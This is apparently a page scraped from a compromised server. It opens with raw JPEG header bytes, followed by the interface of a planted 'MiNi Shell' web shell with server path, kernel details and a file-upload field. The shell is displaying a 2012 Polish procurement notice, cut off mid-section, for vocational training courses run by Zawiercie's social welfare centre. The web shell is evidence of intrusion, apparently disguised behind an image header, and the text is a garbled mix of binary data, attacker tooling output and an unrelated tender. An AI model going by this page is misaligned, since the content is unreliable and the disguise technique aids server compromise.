JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121203/484774-N-2012.html

<p class="kh_header"><b>Zawiercie: Zorganizowanie i przeprowadzenie szkoleń (kursów) zawodowych w projekcie Promocja aktywnej integracji społecznej na terenie miasta Zawiercie realizowanym przez Miejski Ośrodek Pomocy Społecznej w Zawierciu, współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 484774 - 2012; data zamieszczenia: 03.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Piłsudskiego 47, 42-400 Zawiercie, woj. śląskie, tel. 032 6722134, faks 032 6727701.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopszawiercie.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń (kursów) zawodowych w projekcie Promocja aktywnej integracji społecznej na terenie miasta Zawiercie realizowanym przez Miejski Ośrodek Pomocy Społecznej w Zawierciu, współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkoleń (kursów) zawodowych w projekcie Promocja aktywnej integracji społecznej na terenie miasta Zawiercie realizowanym przez Miejski Ośrodek Pomocy Społecznej w Zawierciu, współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej:

Część I
1)	Pokojówka - 12 osób,
2)	Nowoczesny sprzedawca - 8 osób,
3)	Kurs fryzjerski: damsko - męski  I stopnia - 5 osób,
4)	Kurs na kucharza i organizację imprez okolicznościowych - 2 osoby,
5)	Grafika komputerowa - 2 osoby,
6)	Technolog wykańczania wnętrz - 3 osoby,
7)	Specjalista ds. turystyki - 2 osoby,
8)	Pracownik kadrowo - płacowy - 1 osoba.
Część II
Pracownik ochrony osób i mienia (licencja I stopnia) - 5 osób.

Szczegółowy opis:
Część I
Zamawiający zastrzega, że wynagrodzenie - w zakresie części nr I ulegnie obniżeniu (w stosunku do całkowitego wynagrodzenia brutto) proporcjonalnie do liczby osób, które ukończą szkolenie, maksymalnie jednak o 7 osób, które nie ukończą danego szkolenia (kursu), tym samym Wykonawca otrzyma wynagrodzenie za nie mniej niż 28 osób.
Za osobę, która ukończyła szkolenie uznany zostanie uczestnik szkolenia, który uczestniczył w co najmniej 80% zajęć.
Zamawiający wymaga, aby oferowane usługi - w zakresie części nr I wykonywane były przez Wykonawcę posiadającego certyfikat systemu zarządzania jakością spełniający wymagania normy PN-EN ISO 9001:2009 w zakresie świadczenia usług szkoleniowych lub równoważny - oparty na odpowiednich normach europejskich.
W celu potwierdzenia, że oferowane usługi odpowiadają w/w wymaganiu określonemu przez zamawiającego, żąda się zaświadczenia (certyfikatu) niezależnego podmiotu zajmującego się poświadczaniem zgodności działań Wykonawcy z normami jakościowymi opartymi na odpowiednich normach europejskich - PN-EN ISO 9001:2009 w zakresie świadczenia usług szkoleniowych. Wykonawca może zamiast powyższego zaświadczenia (certyfikatu PN-EN ISO 9001:2009 w zakresie świadczenia usług szkoleniowych) złożyć inne dokumenty potwierdzające odpowiednio stosowane przez wykonawców równoważnych środków zapewnienia jakości opartych na odpowiednich normach europejskich.

1)	Pokojówka - 12 osób.
Czas trwania szkolenia:  godzin 140 - 60 godzin zajęć teoretycznych, 80 godzin zajęć praktycznych

Cel szkolenia - nabycie kwalifikacji do wykonywania zawodu pokojówki w hotelu 
- zapoznanie z zasadami higieny oraz przepisami bhp i sanitarnymi w pracy pokojówki.

Program szkolenia:
- Standard pracy i procedury obowiązujące w hotelu.
- Regulamin hotelowy.
- Zadania i organizacja pracy personelu hotelowego - czynności pokojowej i personelu pięter.
- Zadania pokojowej i wygląd pokojowej.
- Współpraca z recepcja i innymi działami hotelu.
- Kultura pracy i etyka zawodowa w kontaktach z gościem hotelowym.
- Savoir - vivre.
- Etyka zawodowa- co wolno a czego nie wolno.
- Obsługa sprzętu i środków technicznych utrzymania czystości.
- Rodzaje o obsługa sprzętu do czyszczenia podłóg.
- Obsługa sprzętu do czyszczenia mebli.
- Rodzaje sprzętu do prania bielizny.
- Bezpieczne stosowanie środków czystości w praktyce.
- Technika sprzątania pokoi hotelowych.
- Sprzątanie pomieszczeń ogólnodostępnych i reprezentacyjnych.
- Utrzymywanie porządku i czystości na stanowisku pracy oraz przestrzeganie wymogów sanitarnych i bhp.
- Wygląd zewnętrzny, higiena.
- Regulamin pracy - obowiązki w pracy.
Uczestnicy powinni zdobędą kwalifikacje do pracy na stanowisku pokojówka w hotelu. 

2)	Nowoczesny sprzedawca - 8 osób.
Cel szkolenia - przyuczenie do pracy w sklepach, gdzie prowadzona jest sprzedaż detaliczna i hurtowa. Obsługa wózków widłowych, obsługa kasy fiskalnej, obsługa magazynu.
Czas trwania szkolenia -  160 godz.

Ramowy zakres tematyczny szkolenia obejmuje:
-	obsługę kas fiskalnych (absolwenci kursu powinni zostać zaznajomieni z zasadami działania kas fiskalnych i innych urządzeń sklepowych (wag elektronicznych, czytników kodów, itp.) oraz poznać przepisy Ministra Finansów regulujące zastosowanie kas i innych urządzeń sklepowych w placówkach handlowo-usługowych), metkownicy, liczarki
-	organizację i techniki sprzedaży, technikę składowania,
-	efektywną obsługę klienta,
-	bhp w nowoczesnym handlu detalicznym (podstawy prawne z zakresu BHP i ppoż., sposoby ochrony przed niebezpiecznymi czynnikami mogącymi wystąpić w pracy oraz zasady postępowania w przypadku zagrożeń i wypadków), w magazynach i składach towarów,
-	podstawy obsługi komputera - system operacyjny Windows, edytor tekstu, arkusz kalkulacyjny,
-	rozpoznawanie falsyfikatów,
-	podstawy obsługi jednego z programów magazynowych,
-	minimum sanitarne (najważniejsze informacje dotyczące obowiązujących przepisów i norm dotyczących minimum sanitarnego w handlu),
-	kurs kierowców wózków widłowych,
-	kurs wymiany butli gazowej.

3)	Kurs fryzjerski: damsko - męski  I stopnia - 5 osób.
Cel szkolenia - przygotowanie osób do pracy w tym zawodzie w salonie fryzjerskim, bądź też na podjęcie działalności na własny rachunek.
Czas trwania szkolenia -  łączna liczba godzin kursu nie powinna być mniejsza niż 300 godzin, przy czym co najmniej 70% tego czasu powinno być przeznaczone na praktykę w pracowniach lub salonach fryzjerskich.

Program szkolenia powinien obejmować zajęcia teoretyczne oraz praktyczne, ze szczególnym naciskiem przede wszystkim na zajęcia praktyczne, gdyż są one szczególnie niezbędne do nauczenia się tego zawodu i na doskonalenie poszczególnych technik strzyżenia. 

Ramowy zakres tematyczny obejmuje:
-	wiadomości ogólne z zakresu fryzjerstwa, stylistyki, dobór fryzur w zależności od kształtu twarzy,
-	wiadomości z zakresu bhp,
-	rodzaju i technik strzyżeń, modelowania, rodzaju upięć,
-	wszelkich zabiegów stosowanych w salonach fryzjerskich (trwała ondulacja, farbowanie włosów, farbowanie brwi i rzęs),
-	higienę zawodową.

4)	Kurs na kucharza i organizację imprez okolicznościowych - 2 osoby.
Cel szkolenia - przygotowanie osób do pracy w tym zawodzie lub podjęcie działalności na własny rachunek.

Czas trwania szkolenia -  Łączna liczba godzin kursu nie powinna być mniejsza niż 140 godzin, przy czym co najmniej 100 godzin winno być przeznaczone na praktykę w zakładach gastronomicznych lub stołówkach.
Tematyka kursu powinna zawierać: zarys technologii, podstawy towaroznawstwa.

Ramowy zakres tematyczny obejmuje:
- organizację pracy kucharza, gastronomii, imprez okolicznościowych,
- obsługę punktów gastronomicznych,  
- podstawową wiedzę o zasadach żywienia, towaroznawstwie,
- podstawowe wiadomości o zakładach gastronomicznych, poziomie i kulturze obsługi klienta, zasady serwowania dań zasadniczych,
- wiedzę na temat kalkulacji gastronomicznej,
- zasady oprawy florystycznej podczas organizacji imprez,
- minimum sanitarne (najważniejsze informacje dotyczące obowiązujących przepisów i norm dotyczących minimum sanitarnego w handlu).

5)	Grafika komputerowa - 2 osoby.
Cel szkolenia - przygotowanie osób do pracy z programami Adobe Photoshop i Corel Draw
Czas trwania szkolenia - 80 godzin

Opis kursu:
I BLOK
Podstawy grafiki komputerowej - 5 godzin.

II BLOK
Adobe Photoshop - program kursu (30h):

1. Interfejs programu Adobe Photoshop
Grafika rastrowa i wektorowa - specyfika, podobieństwa i różnice.
Najpopularniejsze formaty graficzne.
Arkusz roboczy Photoshopa, personalizacja interfejsu, paski, okna, dokery, skróty.
Otwieranie, zapisywanie i opcje dokumentu PSD.
Linijki, siatka, prowadnice - ustawienia.
Definiowanie wielkości i rozdzielczości obrazu.
Definiowanie wielkości obszaru roboczego.
Przygotowanie obrazu do druku i na stronę WWW.
Kadrowanie.

2. Technika pracy na warstwach:
Tworzenie nowych warstw - metody kopiowania, usuwania, zmiany kolejności warstw.
Blokowanie przezroczystości, położenia, pikseli.
Łączenie warstw, spłaszczanie obrazka.
Zmiana przezroczystości między warstwami.
Wyrównywanie warstw.
Zarządzanie warstwami za pomocą zestawów (folderów).
Style warstwy, grupowanie i transformacje warstw.

3. Selekcje:
Podstawowe narzędzia selekcyjne i ich ustawienia.
Operacje na selekcjach: wtapianie, wygładzanie, rozszerzanie, zawężanie, transformacja swobodna.
Zapisywanie zaznaczenia w kanale.
Zaznaczanie pikseli podobnych i powiększanie automatyczne zaznaczenia.
Zaznaczanie zakresu koloru.
Przenoszenie selekcji i warstw między obrazami.
Wypełnianie selekcji i obrys.

4. Podstawowe narzędzia malarskie:
pędzel, ołówek, gumka.

5. Praca z tekstem:
Formatowanie tekstu.
Praca z tekstem akapitowym.
Efekty tekstowe.

6. Podstawy edycji i tonowania obrazu:
Rozjaśnianie, ściemnianie, nasycanie, wysycanie, smużenie.
Pieczątka (Stamp Tool), łatka i inne.
RGB, CMYK, LAB, HSB.
Omówienie kanałów.
Praca z obrazem czarno-białym.
Funkcje i narzędzia retuszerskie.

7. Korekta kolorystyczna obrazu:
Automatyczna korekta obrazów.
Praca na poziomach jasności i Histogramie.
Korygowanie poziomów jasności za pomocą Curves.
Zmiana kolorów, nasycenia, jasności za pomocą Hue-Saturation.
Zmiana kolorów, nasycenia, jasności za pomocą Replace Color.
Filtrowanie korekcyjne i destrukcyjne.

8. Ścieżki - tworzenie i edycja:
Przekształcanie ścieżek w selekcje i odwrotnie.
Narzędzia do edycji ścieżek.
Praca na węzłach.

9. Funkcje grafiki internetowej:
Tworzenie animacji.
Tworzenie MAP Cięcie obrazków.
Tworzenie Rollover.

10. Własny projekt reklamowy w formacie rastrowym.

III BLOK
Corel DRAW - program kursu (30h):
1. Interfejs programu Corel Draw:
Grafika rastrowa i wektorowa - specyfika, podobieństwa i różnice.
Najpopularniejsze formaty graficzne.
Arkusz roboczy Corela, personalizacja interfejsu, paski, okna, dokery, skróty.
Otwieranie, zapisywanie i opcje dokumentu CDR.
Menedżer obiektów i symboli - praca na warstwach.
Teczki podręczne.
Rodzaje widoków, dokumenty wielostronicowe.
Linijki, siatka, prowadnice - ustawienia.

2. Podstawowe narzędzia edycyjne:
Rysowanie, przenoszenie, usuwanie obiektów.
Skalowanie, obracanie, pochylanie obiektów przy pomocy myszki.
Duplikowanie obiektów (wszystkie metody).
Ustawianie atrybutów konturu.
Zapoznanie się ze wszystkimi rodzajami wypełnień, tworzenie własnych wypełnień.

3. Precyzyjne transformacje obiektów - 3h:
Rozmiar i położenie.
Obrót.
Skala i lustro.
Pochylanie.

4. Wyrównywanie i rozkład obiektów, modyfikowanie kształtu:
Grupowanie i łączenie.
Kształtowanie obiektów: część wspólna, przycinanie, spawanie.
Edycja krzywej Beziera i tworzenie złożonych kształtów narzędziem kształtu.
Praca na węzłach.
Rozłączanie i łączenie obiektów.
Rozłączanie, łączenie i wyrównywanie węzłów.

5. Tekst i obróbka tekstu w Corelu: 
Formatowanie i edycja tekstu.
Rodzaje i atrybuty tekstu.
Dopasowywanie tekstu do ścieżki.

6. Narzędzia wspomagające pracę w Corel Draw:
Wektoryzacja grafik rastrowych. 
Import formatów nie obsługiwanych przez program do grafiki wektorowej.
Wymiarowanie obiektów - rysunek techniczny. 
Przygotowanie pliku do druku w formacie postscriptowym EPS.

7. Efekty w formacie wektorowym:
Perspektywa.
Obwiednia.
Metamorfoza.
Wytłoczenie.
Soczewki - warstwy efektowe.
Kadrowanie.
Interaktywne efekty, m.in. przezroczystość.

8. Efekty w formacie rastrowym:
Trójwymiarowe.
Rozmywanie, wyostrzanie.
Twórcze, zniekształcanie, ozdobne.

9. Własny projekt reklamowy w formacie wektorowym:

IV BLOK - 15 godzin.
Tworzenie stron WWW.
6)	Technolog wykańczania wnętrz - 3 osoby.
Cel szkolenia - teoretyczne i praktyczne przygotowanie słuchaczy do wykonywania budowlanych prac wykończeniowych.

Czas trwania szkolenia - 30 godzin teoretycznych i 120 godzin praktycznych.

Ramowy zakres tematyczny szkolenia obejmuje:
- przyuczenie do zawodu,
- przepisy BHP i ppoż obowiązujące w zawodzie,
- autoprezentację zawodową,
- prace budowlane z zastosowaniem płyt kartonowo-gipsowych, 
- kładzenie tynków zwykłych i cienkowarstwowych, 
- montaż sufitów podwieszanych, 
- posadzki z płyt ceramicznych,
- wykończeniowe prace podłogowe, 
- malowanie i prace dekoracyjne,
- wykończeniowe prace podłogowe z wykładzin PCV,
- wymiana urządzeń sanitarnych,
- montaż drzwi.

7)	Specjalista ds. turystyki - 2 osoby.
Cel szkolenia - przygotowanie osób do pracy w biurach podróży.

Czas trwania szkolenia - 32 godziny szkoleniowe.

Program kursu:
I BLOK
Sprzedaż oferty agencyjnej:
1.	Nauka systemów rezerwacyjnych m.in.: MerlinX, BlueVendo, Tom, Sykon, Secur, Sift, Voyager, IRISplus.
2.	Przygotowanie oferty dla klienta i jej prezentacja: telefoniczne, twarzą w twarz w biurze, drogą  mailową.
3.	Poznanie destylacji turystycznych: kraje, kurorty, hotele, wycieczki fakultatywne, i inne atrakcje turystyczne.
4.	Ubezpieczenie turystyczne z punktu widzenia sprzedawcy i klienta biura.
5.	First i last minute oraz inne promocje.
6.	Współpraca z centrami rezerwacji i działami współpracy agencyjnej touroperatorów.
7.	Anulowanie umowy, skargi i reklamacje.
II BLOK
Tworzenie oferty własnej:
1.	Pisanie i kalkulowanie programów wycieczek - w oparciu o rzeczywiste zapytania klientów.
2.	Realizacja tych programów: rezerwacja hoteli, posiłków, biletów, pilotów, przewodników, itp.
3.	Odprawa pilota i nadzór nad przebiegiem wycieczki.
4.	Sprawozdanie końcowe z realizacji wycieczki.
5.	Uwarunkowania prawne organizatora turystyki, regulacji najnowszej ustawy, zezwolenia, ubezpieczenia, gwarancje bankowe.

8)	Pracownik kadrowo-płacowy - 1 osoba.
Cel szkolenia - przygotowanie osób do pracy na stanowisku pracownik kadrowo-płacowy.
Czas trwania szkolenia - nie powinien być krótszy niż 80 godz., przy czym do objaśnień winien być użyty program Subiekt.

Ramowy zakres tematyczny szkolenia obejmuje:
-	prawo pracy (rodzaje umów o pracę, urlopy pracownicze, ewidencja czasu pracy, prowadzenie dokumentacji pracowniczej, uprawnienia związane z rodzicielstwem, BHP, obowiązki pracodawcy i pracownika),
-	delegacje służbowe (koszty dojazdów i przejazdów, diety, noclegi, koszty reprezentacji),
-	ubezpieczenia społeczne (zasady obejmowania poszczególnymi rodzajami ubezpieczenia, składki na ubezpieczenie zdrowotne, na Fundusz Pracy, wypełnianie i korekta dokumentów ZUS-owskich, obowiązki rozliczeniowe zakładów pracy wobec urzędów skarbowych,
-	podatek dochodowy od osób fizycznych,
-	obsługę programu Subiekt.

Część II
Pracownik ochrony osób i mienia (licencja I stopnia) - 5 osób.
Zamawiający zastrzega, że wynagrodzenie - w zakresie części nr II ulegnie obniżeniu (w stosunku do całkowitego wynagrodzenia brutto) proporcjonalnie do liczby osób, które ukończą szkolenie, maksymalnie jednak o 1 osobę, która nie ukończy szkolenia (kursu), tym samym Wykonawca otrzyma wynagrodzenie za nie mniej niż 4 osoby.

Czas trwania szkolenia -  kurs trwa 245 godzin, w tym 50 godz. bloku ogólnoprawnego, 70 godz. bloku ochrony mienia, 30 godz. bloku ochrony osób, 35 godz. wyszkolenia strzeleckiego (w tym strzelanie) oraz 60 godz. blok samoobrony i technik interwencyjnych.

Program kursu ma obejmować cykle tematyczne i odpowiednią do nich liczbę godzin (245) ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (t,j. Dz.U. z 2005, Nr 145 poz. 1221 z późn. zm.) wraz z aktami wykonawczymi.

Zajęcia będą prowadzone metodą wykładów i ćwiczeń praktycznych, oraz zajęć praktycznych w firmie ochroniarskiej.

Uprawnienia wynikające z licencji I stopnia:
X bezpośrednia ochrona fizyczna stała lub doraźna,
X dozór sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach i systemach alarmowych,
X konwojowanie wartości pieniężnych, przedmiotów wartościowych lub niebezpiecznych,
X służba w specjalistycznych uzbrojonych formacjach ochronnych.

Wykonawca wyda odpowiednie dyplomy i świadectwa, które potwierdzają uzyskanie w/w specjalistycznych kwalifikacji w zakresie ochrony osób i mienia. 
Wykonawca opłaci (bez kosztów dojazdu i powrotu) badania lekarskie i psychologiczne osób ubiegających się o wydanie licencji (uczestników szkolenia).
Wykonawca dokona jednorazowo opłaty (bez kosztów dojazdu i powrotu) za wydanie licencji pracownika ochrony (uczestnikom szkolenia).

Wymagania dotyczące szkoleń (ogółem):
Wykonawca przedstawi do akceptacji Zamawiającemu, po wcześniejszym skonsultowaniu potrzeb uczestników, w terminie do 7 dni roboczych po podpisaniu umowy szczegółowy harmonogram szkolenia (zawierający harmonogram i szczegółowy zakres tematyczny dostosowany do celu i programu szkolenia). Zaakceptowany przez Zamawiającego harmonogram stanowić będzie integralną część umowy. W uzasadnionych przypadkach harmonogram może ulec zmianie (po uzgodnieniach Wykonawcy z Zamawiającym) w terminie realizacji zamówienia w niezbędnym zakresie - związanym z dostosowaniem go do potrzeb uczestników. Zajęcia będą prowadzone w dni robocze od poniedziałku do piątku, w godz. 8.00-20.00, przy czym jedno spotkanie nie może trwać dłużej niż 6 godzin.
Uczestnicy szkolenia nie będą ponosić żadnych kosztów uczestnictwa w kursie (szkoleniu).
Wykonawca zobowiązuje się do sprawdzania obecności uczestników szkolenia na każdych zajęciach - obecność na szkoleniu uczestnicy potwierdzają własnoręcznym podpisem na liście.
Wykonawca zobowiązany jest do przestrzegania zasad wizualizacji, określonych w:
1)	Rozporządzeniu Komisji (WE) nr 1828 z 8 grudnia 2006 r. ustanawiającym szczegółowe zasady wykonania rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r., ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności,
2)	Wytycznych Ministra Rozwoju Regionalnego z dnia 13 sierpnia 2007 r. (po wprowadzeniu zmiany w dniu 5 października 2007 r.) w zakresie informacji 
i promocji oraz Strategią Komunikacji Funduszy Europejskich w Polsce na lata 2007-2013, określających podstawowe zasady prowadzenia działań informacyjnych i promocyjnych na potrzeby Narodowej Strategii Spójności oraz wszystkich programów operacyjnych w jej ramach, 
3)	Wytycznych dotyczących oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki, które stanowią załącznik i są integralną częścią obowiązującej wersji Planu komunikacji PO KL.

Wykonawca zobowiązany jest do umieszczania logo PO KL, UE, oraz informacji o współfinansowaniu przedmiotu umowy z EFS, w szczególności w budynku, w którym prowadzone będzie szkolenie (wewnątrz i na zewnątrz), na materiałach dotyczących realizacji przedmiotu zamówienia oraz na oficjalnej korespondencji bezpośrednio związanej z realizacją przedmiotu zamówienia.

Miejsce szkolenia: województwo śląskie, przy czym w przypadku, gdy zajęcia będą odbywały się poza Zawierciem Wykonawca zapewni transport osób z Zawiercia (spod siedziby MOPS) i powrót lub zwróci uczestnikom szkolenia koszty przejazdu w obie strony.

Zaznacza się, iż w cenę każdego kursu powinny zostać wliczone w szczególności koszty: 
- zapewnienia odzieży ochronnej, 
- materiałów dydaktycznych,
- poczęstunku kawowego (kawa, herbata, cukier, śmietanka, ciastka),
- ubezpieczenia od następstw nieszczęśliwych wypadków (w trakcie zajęć, jak również na dojazd i powrót).

Suma ubezpieczenia na uczestnika szkolenia: 10.000,00 zł (w przypadku śmierci spowodowanej nieszczęśliwym wypadkiem, 10.000,00 zł w przypadku 100 % trwałego uszczerbku powstałego w wyniku nieszczęśliwego wypadku).
Ubezpieczenie obejmować ma następstwa nieszczęśliwych wypadków zaistniałych podczas szkolenia, w drodze na szkolenie i ze szkolenia. 
Nieszczęśliwy wypadek: nagłe zdarzenie spowodowane przyczyną zewnętrzną, w wyniku której uczestnik szkolenia doznał trwałego uszczerbku na zdrowiu lub zmarł.
Wydawane dokumenty - zaświadczenie o ukończeniu danego kursu.
Szczegółowy zakres przedmiotu zamówienia określają także wzory umów z załącznikami - osobno dla każdej części nr I - II), które stanowią załączniki do specyfikacji istotnych warunków zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
